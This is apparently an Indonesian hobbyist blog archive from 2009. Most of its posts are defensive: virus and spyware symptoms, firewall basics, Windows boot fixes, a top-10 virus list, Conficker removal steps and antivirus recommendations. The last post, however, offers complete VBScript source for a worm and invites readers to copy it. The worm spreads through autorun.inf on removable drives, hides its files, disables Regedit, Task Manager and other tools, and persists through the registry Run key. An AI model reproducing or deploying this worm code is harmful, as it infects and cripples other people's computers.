HIDDEN CODE,VIRUS,MALWARE,CRACKING,HACKING

Gejala Komputer Kena Virus

2009-12-10T05:56:00.000-08:00

Nah-nah...kalau masalah Virus saya mengerti...ha ha ha...maklum saya juga termasuk Virus Maker meski Newbie....cukup basa-basinya...Apakah kalian tahu gejala apa saja yang di timbulkan jika Komputer terkena Virus....ada beberapa gejala...seperti....

1. Komputer mulai berjalan sangat lambat.Kalo cuma buka aplikasi ringan aja butuh waktu menitan, ini tanda paling umum komputer udah terinfeksi
2. Muncul file-file aneh. Misalnya di folder tertentu muncul file-file yang gak kita inget kapan naronya. Apalagi kalo udah extensinya yang aneh atau gak sesuai dengan iconnya (icon Ms Word tapi application?). Ataupun ada folder yang muncul dalam folder dengan nama sama
3. Komputer suka restart sendiri. Apalagi jika kita masuk ke program antivirus, task manager, msconfig, Regedit, atau program lain yang seharusnya bisa dijalankan secara wajar (Kok komputer saya waktu jalanin game Crysis suka restart sendiri? Ya Iyalah, itu mah komputer nya aja yang gak kuat, neng.)
4. Hilangnya beberapa option di komputer. Misalnya Folder option, Regedit, Run, command prompt. Atau apabila sudah melakukan perubahan, tapi gak ngefek. Misal di folder option “show hidden file” udah kita checklist (Baca: ceklis) tapi pas di OK eh hidden filenya gak tetep gak keliatan.
5. Muncul pesan-pesan aneh gak jelas. (yang udah keinfeksi louhan tau deh pasti)
6. Program antivirus gak bisa jalan.

Kebanyakan semua Virus itu menyerang Registry...nah-nah...Kalau Regestry udah keserang yah cara lainnya ya install ulang....ha ha ha...tapi itu cuma ALTERNATIF TERAKHIR...tidak semua Komputer kena virus harus di Install Ulang...ada ALTERNATIF LAIN...salah satunya yang kita harus lakukan adalah...

1. Perkirakan asal virus. Virus gak akan ujug-ujug muncul di komputer, (virus gak nganut generation spontaneous), pasti asalnya dari luar komputer/system kita. Kira-kira kemaren abis install sesuatu? Download? connect (baca: konek) ke internet/LAN? masukin disket? (hari genee masih pake disket??) nancepin flashdisk? kesemuanya adalah sumber virus. Kalo kira-kira udah ketemu di lain waktu berhati-hatilah.
2. Install/Scan/Update Antivirus. Yang pertama upaya yang perlu kita lakukan adalah install antivirus buat yang belum ada. yang udah ada? segera full scan komputer. Masih gak keditek (baca: ke detect)? update antivirus anda! Perlu gak sih update virus? Ya iya lah. Tiap hari kira-kira ada 10 varian virus baru yang tercipta. Kalo gak update ya siap-siap aja. Antivirus mahal? gak mau pake bajakan? udah ada banyak kok antivirus free macam AVG, PCMAV, Antivir. Beberapa produsen antivirus pun udah mulai merilis free edition nya. Yang murah ada juga kok, mulai dari 50.000/tahun juga ada.
3. Biasanya virus yang mencurigakan udah dapat keditek meskipun gak bisa dihilangkan. Pilihannya: kirim contoh virus ke produsen antivirus untuk dianalisis dan dibuatkan vaksinnya, atau browsing di internet buat cari cara penanggulangannya.
4. Konsultasi ke para ahli. Maksudnya ahli disini teman, sodara, orang tua, istri, suami, anak, yang suka otak-atik komputer atau sebagian harinya dihabiskan di depan komputer buat nanggulangin masalah virus ini. Kalo di kantor sih contact aja bagian IT nya. Jangan lupa kasi uang ala kadarnya, atau kalo gak enak, traktir makan, beliin coklat, kasi pinjem DVD dan lainnya.
5. Buat yang udah ahli ya bisa cari dan tanggulangi virus itu sendirian . Safe mode> cari dan basmi virus yang ada.
JIKA SEMUA CARA SUDAH DILAKUKAN DAN TIDAK BERHASIL...MAKA CARA TERAKHIR YAITU........................INSTALL ULANG....HA HA HA

Komputer kena Spyware

2009-12-10T05:46:00.000-08:00

Karena saya tak terlalu mengerti masalah Spyware...ya ini ada info dikit lah masalah Komputer yang terkena Spyware...ada beberapa ciri...

Yang pertama adalah...
Visual
Tanda yang paling jelas dari sistem yang terinfeksi cenderung visual. Di antaranya, mungkin tidak ada yang lebih umum dibanding tanda spyware utama: jendela pop-up. Ini biasanya jendela browser dengan style Internet Explorer yang berisi iklan atau pesan peringatan. Ini biasanya muncul pada waktu Anda kali pertama logon ke komputer, atau pada waktu Anda menjalankan web browser. Perubahan terhadap setting browser tanda yang harus diperhatikan dalam mencari spyware. Sebagai contoh, jika Anda mengeset home page ke google (http://www.google.com), tetapi yang ditampilkan adalah halaman yang berbeda setiap kali Anda menjalankan browser, anggap saja sistem Anda terinfeksi. Ini terbukti benar terutama pada Internet Explorer, karena kontrol ActiveX yang di-download dari halaman web yang mencurigakan bisa melakukan perubahan tanpa sepengetahuan Anda.

Satu lagi tanda yang umum dari spyware adalah adanya toolbar pihak ketiga yang tidak dikenal pada Internet Explorer. Pada situasi tertentu mereka dimuat langsung di bawah bar alamat IE. Pada situasi lain, toolbar diinstalasi dan dimuat tetapi dicampur dekat toolbar built-in, supaya tidak menimbulkan kecurigaan. Untuk melihat apakah ada toolbar ekstra yang dimasukkan ke sistem Anda, buka Internet Explorer dan lihat View, Toolbars. Semua selain Standard Buttons, Address Bar, dan Link merupakan toolbar pihak ketiga, dan bisa saja spyware.

Satu visual terakhir yang perlu diwaspadai adalah icon desktop yang tidak dikenal atau tidak familiar. Sebagai contoh, misalnya shortcut ke situs , kasino Internet, atau program yang tidak familiar. Jika Anda menemukan ini, halus mereka dari desktop, lalu gunakan program anti-spyware untuk semua komponen yang perlu dihapus. Apapun yang Anda lakukan, jangan klik mereka—Anda bisa saja membuat sesuatunya lebih buruk.

Kinerja
Seiring dengan waktu, setiap komputer akan mengalami kelambatan dan error. Meskipun kedua “petunjuk” ini sering kali hanya indikasi perlunya melakukan maintenance—menghapus program yang tidak diperlukan, membatasi mana yang dijalankan secara otomatis, dan melakukan maintenance seperti defragmentasi—mereka juga sering kali menunjukkan adanya spyware.

Sebagai contoh, Anda mungkin merasakan penurunan respon system keseluruhan secara dramatis, yang bisa saja akibat dari program spyware yang memakan memory pada waktu dijalankan secara background. Atau, mungkin Anda merasakan meningkatnya jumlah pesan error yang diterima. Pada kedua kasus, spyware bisa disalahkan, paling tidak pada tingkat tertentu. Ini benar terutama jika Anda tidak mempunyai kebiasaan sering menginstalasi software baru. Jadi, jika jauh lebih lambat dari biasanya (atau sesuatunya tidak bekerja seperti biasa), kini saatnya melakukan scan spyware pada komputer Anda untuk mengembalikan sesuatunya ke normal.

Di Belakang Layar
Petunjuk visual dan kinerja relatif mudah ditemukan, tetapi yang lain butuh sedikit usaha. Salah satu contoh adalah daftar situs yang di-bookmark pada Internet Explorer. Meskipun Anda sudah tidak lama menggunakannya (karena ganti ke Firefox misalnya), luangkan waktu untuk membuka IE dan melihat isi menu Favorites. Jika system Anda terinfeksi oleh spyware, Anda akan menemukan banyak link ke situs mencurigakan, mulai dari , judi, dan cara cepat untuk kaya. Kami sarankan untuk menghapus item secara manual, lalu melakukan scan. Biasanya, program anti-spyware tidak akan menghapus apapun dari daftar karena takutnya menghapus sesuatu yang mungkin Anda butuhkan pada masa yang akan datang.

Indikator infeksi yang lain adalah program sekuriti seperti firewall, antispyware atau antivirus di-disable atau shutdown. Spyware (dan virus) tertentu mempunyai komponen untuk mendisable proteksi Anda sebagai cara untuk memastikan kelanjutan hidup mereka. Icon pada System tray bisa menjadi petunjuk yang baik untuk mengetahui apakah program tersebut aktif, demikian juga dengan Security Center pada Control Panel XP.

Sebagian alasan mengapa spyware sering kali tidak diketahui adalah karena Windows memungkinkan program untuk dijalankan secara background. Jika Anda benar-benar ingin tahu apa yang berjalan pada sistem, lihat tab Process pada Task Manager. Di situ Anda akan menemukan nama setiap proses yang berjalan pada PC, termasuk program spyware yang aktif. Anda akan memerlukan sedikit bantuan untuk mengetahui proses mana yang benar (sah) dan mana yang tidak, tetapi ProcessLibrary.com akan membantu Anda menemukan jawabannya.

Tagihan Telepon Membengkak
Petunjuk terakhir bahwa sistem Anda terinfeksi oleh spyware adalah yang paling mengejutkan, dan datang melalui pos. Kita berbicara tentang tagihan telepon dan jika sistem Anda terinfeksi oleh yang dikenal dengan program dialer, maka Anda tidak akan senang pada waktu menerimanya. Program ini biasanya diinstalasi melalui Web plug-in atau bersama dengan program yang kelihatannya tidak bermasalah (sering kali dihubungkan dengan kasino online atau situ ). Begitu mendapatkan jalan untuk masuk ke sistem, mereka menggunakan modem Anda untuk melakukan panggilan jarak jauh ke tempat di seluruh dunia, membuat tagihan internasional yang sangat besar.

Firewall: Apapun Cara Yang Digunakan Untuk Terhubung Ke Internet, Anda Memerlukan Perlindungan
Pernah ada anggapan bahwa firewall hanya digunakan dalam perusahaan besar—mereka digunakan supaya user Internet bisa terhubung ke sistem dalam jaringan privat. Namun, dengan semakin bertambahnya popularitas Internet, hacker dan pembuat script mulai menyadari bahwa ada target yang sangat mudah di luar sana, yaitu end user (yang menggunakan koneksi dial-up dan broadband), yang sering kali tidak mengamankan komputer mereka pada waktu online. Sama seperti Anda tidak mau meninggalkan pintu mobil tidak terkunci pada tempat parkir umum, maka sangat penting untuk mengunci user Internet dari komputer Anda dengan menggunakan firewall.

Yang Dilakukan Firewall
Pada tingkat paling dasar tugas firewall adalah untuk mengontrol traffic jaringan apa yang bisa memasuki atau meninggalkan PC Anda. Biasanya, firewall secara otomatis akan memblokir semua koneksi yang dilakukan user Internet ke komputer Anda, tetapi membolehkan request Internet yang berasal dari PC Anda. Dengan kata lain, firewall akan menghentikan user luar sehingga tidak dapat terhubung ke sistem Anda, sementara Anda bisa mengakses Internet tanpa larangan.

Konfigurasi default ini bekerja dengan baik bagi sebagian besar user, tetapi firewall pada dasarnya juga menyediakan kontrol yang lebih besar atas apa yang boleh memasuki atau meninggalkan sistem Anda. Sebagai contoh, misalnya Anda ingin memblokir semua request outgoing dari komputer Anda, kecuali untuk service biasa seperti browsing web, dan mengirim/menerima e-mail. Dengan konfigurasi ini, user yang mencoba menggunakan service MSN Messenger dari komputer Anda tidak akan bisa melakukannya.

Mempunyai firewall untuk melindungi sistem Anda adalah sangat penting. Alasan pertama adalah karena besarnya ancaman keamanan di mana sistem Windows rentan—sistem yang tidak terproteksi dan ter-patch sering kali bisa diserang oleh user Internet yang menscan range alamat IP untuk mencari system yang lemah. Dengan adanya firewall, koneksi tersebut bisa ditolak—fitur ini dikenal sebagai inbound protection. Jika sistem Anda tidak diproteksi, user luar bisa mengambil alih komputer Anda, dari root sampai file pribadi, dan banyak lagi.

Kedua, firewall memungkinkan Anda mengontrol apa yang meninggalkan sistem Anda—fitur ini yang dikenal sebagai outbound protection. Ini penting karena sekarang spyware dan virus terus menyebabkan kekacauan pada sistem. Dengan firewall yang tepat, program spyware pada sistem Anda tidak akan bisa mengumpulkan dan meneruskan file peronal dan/atau data dari komputer Anda ke server di Internet, dan virus akan membutuhkan waktu lebih lama untuk meng-e-mail diri mereka sendiri ke kontak pada buku alamat Anda. Pada Internet sekarang ini, mempunyai kontrol atas apa yang keluar dari sistem Anda sama pentingnya dengan mempunyai kontrol atas apa yang masuk.

Windows Firewall
Jika Anda menggunakan Windows XP dan telah menginstalasi SP2, maka semua koneksi jaringan sistem Anda otomatis diproteksi oleh Windows Firewall (dengan asumsi Anda tidak menginstalasi program firewall lain). Meskipun Windows Firewall menawarkan inbound protection (dan memungkinkan Anda untuk memilih program atau service mana yang bisa menerima koneksi dari Internet user), ia tidak melakukan apa-apa untuk mengontrol apa yang keluar dari sistem Anda—ia kurang dalam hal kontrol outbound traffic.

Jadi, jika PC Anda terinfeksi oleh spyware, ia bisa berkomunikasi melalui Internet tanpa larangan. Informasi yang dikirimkan dari komputer Anda bisa saja tidak “berbahaya” seperti detail situs web yang telah Anda browsing, tetapi bisa juga meliputi informasi pribadi seperti nomor kartu kredit, atau kumpulan penekanan keyboard yang Anda lakukan.

Apakah itu berarti Windows Firewall tidak menawarkan proteksi yang cukup? Bukan begitu. Windows Firewall bisa jadi semua proteksi firewall yang Anda butuhkan, tetapi hanya jika Anda betulbetul yakin bahwa sistem Anda tidak terinfeksi oleh virus, spyware, atau ancaman lainnya. Pada suatu system yang bersih, Anda tidak perlu memikirkan traffic yang ditujukan ke Internet, karena itu semua di-request oleh Anda. Namun, ancaman seperti spyware dan virus sangat nyata dan terus menginfeksi sebagian besar deskop PC user. Dengan demikian, sebagian besar user memerlukan inbound dan outbound protection.

Firewall Alternatif
Jika Anda khawatir bahwa sistem tidak cukup diproteksi dengan Windows Firewall (atau jika Anda tidak menjalankan Windows XP), maka sekarang waktunya untuk menginstalasi software firewall pada PC Anda. Banyak pilihan yang tersedia, seperti ZoneAlarm, Kerio Personal Firewall, dan lainnya. Produk ini menawarkan inbound dan outbound protection secara lengkap, dan memberi Anda kontrol atas elemen seperti program mana yang diberi akses ke Internet.

Versi bayar dari produk ini datang dengan fitur tingkat lanjut yang luas (seperti kemampuan untuk memproteksi informasi kartu kredit Anda dan men-scan email), kebanyakan tersedia dalam versi free yang juga menawarkan inbund dan outbound protection secara komprehensif, belum lagi notifikasi pada layar memperingati Anda atas event yang penting, seperti koneksi dari user luar, program yang mencoba terhubung ke Internet sendiri, dan banyak lagi.

DI DALAM WINDOWS FIREWALL
- Untuk mengecek apakah Windows Firewall melindungi sistem Anda, buka Control Panel dan cari applet Windows Firewall pada Classic View. Jika ada, buka untuk melihat tab General, yang seharusnya diset ke On (recommended). Jika tidak ada, instalasi SP2.

- Anda bisa mengontrol program dan service mana yang diberi inbound protection dari tab Exceptions. Beri tanda centang item—pada waktu item tidak dicentang, koneksi diblokir. Anda juga bisa membuat daftar pengecualian sendiri.

- Gunakan tab Advanced untuk meng-enable atau disable service, mengonfigurasi setting file log, dan banyak lagi. Pastikan logging dilakukan jika Anda ingin melacak koneksi inbound yang dilakukan ke PC Anda

Gagal Masuk Windows

2009-12-10T05:38:00.000-08:00

Banyak kejadian ketika me re-start lalu muncul pesan error...wah-wah pasti menjengkelkan bukan....hm...saya ada solusinya...mungkin berguna...ha ha ha

Ada beberapa alasan ketika komputer startup lalu tidak mau masuk Windows dan muncul pesan error...antara lain adalah

1. Sistem operasi Windows ada file yang secara tidak sengaja terhapus
2. Ada virus, spyware atau trojan yang ikutan 'loading' ketika komputer startup
3. Ada file (driver) rusak yang rusak, dan ketika dibaca oleh Windows gagal
4. Ada kerusakan pada hardware, terutama pada memori komputer atau harddisk
5. Sistem operasi Windows rusak atau belum selesai diinstalasi
6. Ada setting BIOS yang di-setting tidak benar atau baru diubah

Cara mengatasinya adalah...di banting dan di pukul...ha ha ha...hanya bercanda...

Cara mengecek dan mengatasinya adalah:
1. Startup dengan menggunakan metode 'safe mode' (tekan F5 ketika komputer pertama kali mau masuk ke Windows, lalu pilih 'safe mode'). Kalau komputer berhasil masuk ke Windows berarti ada 'loading' yang tidak bisa dibaca oleh Windows secara benar. Matikan 'loading' tersebut dengan menggunakan perintah 'msconfig' pada bagian startup (panggilnya di start>run>msconfig)

2. Kalau komputer tidak bisa masuk ke Windows, cara termudah adalah repair Windows. Caranya adalah masukkan CD instalasi Windows, terus ubah BIOS untuk startup lewat CD/DVD-ROM, setelah instalasi masuk ke bagian install Windows, pilihan opsi repair Windows. Kamu bisa menginstall ulang Windows ke folder baru atau menformat harddisk bila ternyata repair Windows gagal.

3. Pastikan dahulu kamu tidak ada mengubah setting BIOS sebelumnya, kalau ada kamu sebaiknya mengembalikannya seperti semula, kalau lupa sebaiknya pilih opsi 'Loading BIOS default'.

4. Bila langkah-langkah di atas gagal semua, kemungkinan ada kerusakan pada hardware kamu. Kerusakan pada umumnya terletak pada memori dan harddisk. VGA dan mainboard mungkin juga bisa rusak, tapi kemungkinannya sangat kecil.

catatan: Kerusakan driver VGA card bisa juga menyebabkan Windows tidak bisa masuk. Kamu harus startup di 'safe mode' lalu uninstall driver VGA yang rusak dahulu, dan baru install kembali driver VGA yang benar ketika masuk ke Windows secara normal.

TOP 10 Virus di Indonesia

2009-12-10T04:52:00.001-08:00

Conficker masih menduduki peringkat teratas, diikuti Recycler yang kembali masuk dalam chart dan langsung melejit ke urutan tiga besar, lalu diikuti oleh Autoit. Selengkapnya, silakan lihat daftar berikut ini:

1. Conficker

Daftar domain yang di-black list oleh Conficker.Virus luar berteknologi canggih ini memang menyebar luar biasa. Bentuknya yang merupakan file DLL (Dynamic Link Library) membedakannya dengan kebanyakan virus lain yang berupa EXE. Kemampuan yang dimilikinya juga bisa disetarakan dengan rootkit. Serta, sifatnya ber-polymorphic membuatnya memiliki tubuh yang berubah-ubah. Pada komputer terinfeksi, user tidak akan dapat membuka situs yang “berbau” antivirius atau Microsoft update. Virus ini juga aktif menyebar di Indonesia dengan menggunakan media removable disk misalkan flash disk. Pada flash disk terinfeksi, Anda akan menemukan file autorun.inf dan direktori RECYCLER yang di dalamnya terdapat sub-direktori dengan nama misalkan S-5-3-42-2819952290-8240758988-879315005-3665, dan pada direktori inilah terdapat file virus Conficker dengan nama biasanya jwgkvsq.vmx yang sebenarnya adalah file DLL.

2. Recycler

File virus bersembunyi dibalik Recycle Bin palsu. Seperti pendahulunya, yang menjadi ciri khas dari virus ini adalah teknik bagaimana ia menyebar. Yakni “ngumpet” dalam direktori Recycler/Recycler/Recycle Bin. Ia juga diketahui menerapkan teknik code injection agar kode virus bisa “nyangkut” pada explorer.exe. Ini dilakukannya untuk mempersulit user maupun program antivirus sekalipun untuk membunuhnya. Pada Build3 kali ini, telah disertakan engine cleaner khusus yang dapat membasmi varian Recycler tersebut dengan tuntas. Silakan scan komputer secara menyeluruh, basmi setiap virus yang ditemukan, dan jangan lupa untuk me-restart komputer Anda.

3. Autoit

Menyebarkan pesan ke setiap contact person yang ada di Y!M.Hampir kebanyakan varian dari virus import berbasis script ini menggunakan icon mirip seperti folder. Virus ini memiliki kemampuan untuk melakukan auto update ke beberapa situs. Ia juga dapat memanfaatkan Yahoo! Messenger sebagai media perantara penyebarannya dengan mengirimkan pesan berisi link ke setiap contact person yang ada di Y!M korban.

4. Smansa

Pesan virus Smansa.Virus yang dibuat dengan VB ini bila dilihat pada Explorer dengan mode tampilan Details, ia akan nampak seperti aplikasi standar yang tanpa icon, namun apablia dilihat dengan mode Icons, ia akan nampak sebagai sebuah folder. Virus yang di-pack menggunakan UPX ini, saat menginfeksi akan menciptakan file dengan nama Paket.exe dan Autorun.inf di setiap root drive yang ia temukan. File tersebut diberi attribut hidden agar tidak terlihat dengan setingan standar Explorer. Selain itu, pada drive flash disk terinfeksi juga akan ditemukan sebuah file pesan dengan nama Kenang-kenangan.html yang berisi pesan dari si pembuat virus.

5. GhostyNet

Pesan virus GhostyNet.D. Virus yang diyakini bukan produk lokal ini pada saat dijalankan akan muncul pesan palsu atau “fake error” yang bertuliskan “Memory access violation at 0×000000EF base address 0×000000F0.” yang seolah-olah program tersebut crash padahal virus telah bersemayam di memory. Ia menciptakan dua item Run baru di registry dengan nama avpupdt dan ctfmon. File induk virus ini bersemayam di direktori C:\WINDOWS\system32\1920622684. Pada root drive sistem operasi berada, akan ada file dengan nama index.html yang merupakan pesan virus.

6. Viettel

File properties dari virus Viettel.Virus yang satu ini akan menguras resources komputer korban sehingga terasa sangat lambat. Ia menggunakan icon mirip folder dalam penyebarannya. Diduga keras ia berasal dari Vietnam. Ia akan menciptakan file induk di direktori Windows dengan nama userinit.exe dan di System32 dengan nama system.exe. Pada komputer terinfeksi akan terdapat file dengan nama kdcoms.dll di direktori Windows.

7. HellSpawn

Pesan virus HellSpawn.Virus bericon folder ini dibuat dengan dengan bahasa C++. Nama file induknya mengikuti nama process/services milik Windows seperti service.exe, winlogon.exe, lsass.exe, dan smss.exe. Terdapat juga nama lain yang diduga random. Dalam tubuhnya terdapat database aplikasi yang dilarang untuk dijalankan. Apabila aplikasi yang masuk dalam daftar blacklist tersebut dijalankan, maka akan langsung di-kill.

8. MoneyMy

Pesan kesalahan yang menipu.Virus ini menggunakan icon yang mirip seperti sebuah file instalasi dari Game House, sebuah perusahaan pembuat game. Saat file virus di-klik akan menampilkan pesan kesalahan palsu atau fake error. Virus ini akan menciptakan file induknya pada direktori System32 dengan nama debuger.exe.

9. Autoit-Hubbun

Pesan dari virus Autoit-Hubbun.Virus lokal yang ingin mengikuti jejak Autoit, karena menggunakan aplikasi scripting Autoit dalam pembuatannya. Ia menggunakan icon folder dalam penyebarannya. File induknya berada pada direktori \Windows\System32\wbem\services.exe. Virus ini juga menciptakan file hubbun.txt yang berisi pesan dari si pembuat. Ia masih banyak memiliki bug, terlihat dalam aksinya beberapa kali menampilkan kesalahan pada script.

10.Merlin.bat

Registered information yang telah diubah oleh virus. Salah satu contoh virus sederhana yang hanya dibuat menggunakan file batch (.BAT). Ia akan mengkopikan dirinya pada System32 dengan nama dirsystem.cmd. Lalu mencoba membuat task baru pada Schedule Tasks Windows dengan nama VTTimer yang akan menjalankan file virus tersebut pada rentan waktu yang telah ditentukan. Dalam aksinya ia akan mencoba menyebarkan diri ke setiap drive dengan menciptakan file autorun.inf dan dirsystem.cmd pada drive yang ia temukan. Cara termudah untuk mengetahui apakah komputer terinfeksi virus ini adalah dengan melihat Registered Information Windows, karena diketahui virus ini dapat mengubahnya menjadi “Merlin” dan “GINGO”.

Virus Conficker

2009-12-10T03:05:00.000-08:00

Komputer/laptop anda terserang virus Conficker.Dv...wah-wah kalau begitu anda harus menyimak yang 1 ini....

7 langkah menghilangkan virus Conficker

1. Putuskan komputer yang akan dibersihkan dari jaringan/internet.
2. Matikan system restore (Windows XP/Vista).
3. Matikan proses virus yang aktif pada services. Gunakan removal tool dari Norman untuk membersihkan virus yang aktif. Jika belum memiliki, bisa didownload di situs norman.
4. Delete service svchost.exe gadungan yang ditanamkan virus pada registry. Anda dapat mencari secara manual pada registry.
5. Hapus Schedule Task yang dibuat oleh virus. (C:\WINDOWS\Tasks)
6. Hapus string registry yang dibuat oleh virus. Untuk mempermudah dapat menggunakan script registry di bawah ini:

[Version]
Signature=”$Chicago$”
Provider=Vaksincom Oyee

[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del

[UnhookRegKey]
HKCU, Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced,
Hidden, 0×00000001,1
HKCU, Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced,
SuperHidden, 0×00000001,1
HKLM,
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,
CheckedValue, 0×00000001,1
HKLM, SYSTEM\CurrentControlSet\Services\BITS, Start, 0×00000002,2
HKLM, SYSTEM\CurrentControlSet\Services\ERSvc, Start, 0×00000002,2
HKLM, SYSTEM\CurrentControlSet\Services\wscsvc, Start, 0×00000002,2
HKLM, SYSTEM\CurrentControlSet\Services\wuauserv, Start, 0×00000002,2

[del]
HKCU, Software\Microsoft\Windows\CurrentVersion\Applets, dl
HKCU, Software\Microsoft\Windows\CurrentVersion\Applets, ds
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Applets, dl
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Applets, ds
HKLM, SYSTEM\CurrentControlSet\Services\Tcpip\Parameters, TcpNumConnections

Gunakan notepad, kemudian simpan dengan nama ‘repair.inf’, lalu ‘Save As Type’ menjadi ‘All Files’ agar tidak terjadi kesalahan. Jalankan repair.inf dengan klik kanan, kemudian pilih install.

Sementara untuk file yang aktif pada startup, Anda dapat mendisable melalui ‘msconfig’ atau dapat mendelete secara manual pada string: ‘HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Run’

7. Kemudian Cara menghilangkan virus W32/Conficker.DV secara optimal dan mencegah infeksi ulang, sebaiknya menggunakan anti virus yang terupdate dan mampu mendeteksi virus ini dengan baik dan patch komputer Anda dengan patch resmi dari Microsoft guna mencegah infeksi ulang.

Nah-nah tuw wat jaga-jaga yach...kalau-kalau keserang laksanakan step-step di atas....ha ha ha

Link Antivirus

2009-12-10T02:30:00.000-08:00

16 Antivirus terbaik yang menangani Malware

2009-12-09T23:10:00.001-08:00

Nah kali ini wa beritahu tentang Antivirus yang sangat bagus untuk menangani Malware.Yap langsung saja kita sambut mulai dari yang terbaik adalah...

1. Avast Professional Edition 4.8
2. AVG Antivirus 8.5
3. AVIRA Antivir Premium 9.0
4. BitDefender Antivirus 2010
5. eScan Antivirus 10.0
6. ESET NOD32 Antivirus 4.0
7. F-Secure Antivirus 2010
8. G DATA AntiVirus 2010
9. Kaspersky Anti-Virus 2010
10. Kingsoft AntiVirus 9
11. McAfee VirusScan Plus 2009
12. Microsoft Security Essentials 1.0
13. Norman Antivirus & Anti-Spyware 7.10
14. Sophos Anti-Virus 7.6
15. Symantec Norton Anti-Virus 2010
16. Trustport Antivirus 2009.

Nah udah tahu kan Antivirusnya apaan yang buat Malware...Met Download

Membuat Virus Notepad/VbScript

2009-11-20T07:03:00.000-08:00

Virus Notepad lagi-Notepad lagi...gak bosen-bosen yach liat perkembangan Virus dengan Notepad....wakakakakakakak....No Bacod lage dah...Ney ada Code wat bikin virus Notepad...Mau di Copas Codenya juga gak apa-apa...Gak bakal ada yang marah...wakakakakakakak

‘//–Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus–//
on error resume next

‘//–Dim kata-kata berikut ini–//
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,kalong,nt,check,sd

‘//–Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information–//
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6.dll.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do

‘//–Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
tf.attributes = 32
set tf=fs.createtextfile(windowpath & “\batch- k4l0n6.dll.vbs”,2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
tf.attributes = 39
‘//–Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok–//
‘Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket

for each flashdrive in fs.drives
‘//–Cek Drive–//
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then

‘//–Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\–//
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\k4l0n6.dll.vbs “,2,true)
tf.write rekursif
tf.close
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
tf.attributes = 39

‘//–Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)–//
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next

‘//–Manipulasi Registry–//

set kalong = createobject(”WScript.Shell”)

‘//–Manip – Ubah Title Internet Explorer menjadi THE KALONG v.s. ZAY–//
kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,” THE KALONG v.s. ZAY “

‘//–Manip – Set agar file hidden tidak ditampilkan di Explorer–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “0″, “REG_DWORD”

‘//–Manip – Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”

‘//–Manip – Disable klik kanan–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”

‘//–Manip – Munculkan Pesan Setiap Windows Startup–//
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Worm Kalong. Variant from Rangga-Zay, don’t panic all data are safe.”

‘//–Manip – Aktif setiap Windows Startup–//
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- k4l0n6.dll.vbs “

‘//–Manip – Ubah RegisteredOwner dan Organization–//
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “The Batrix”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”Kalong”

‘//–Nah kalau kode dibawah ini saya nggak tau, tolong Mas Aat_S untuk menjelaskan–//
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(”Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
‘Akhir dari Kode

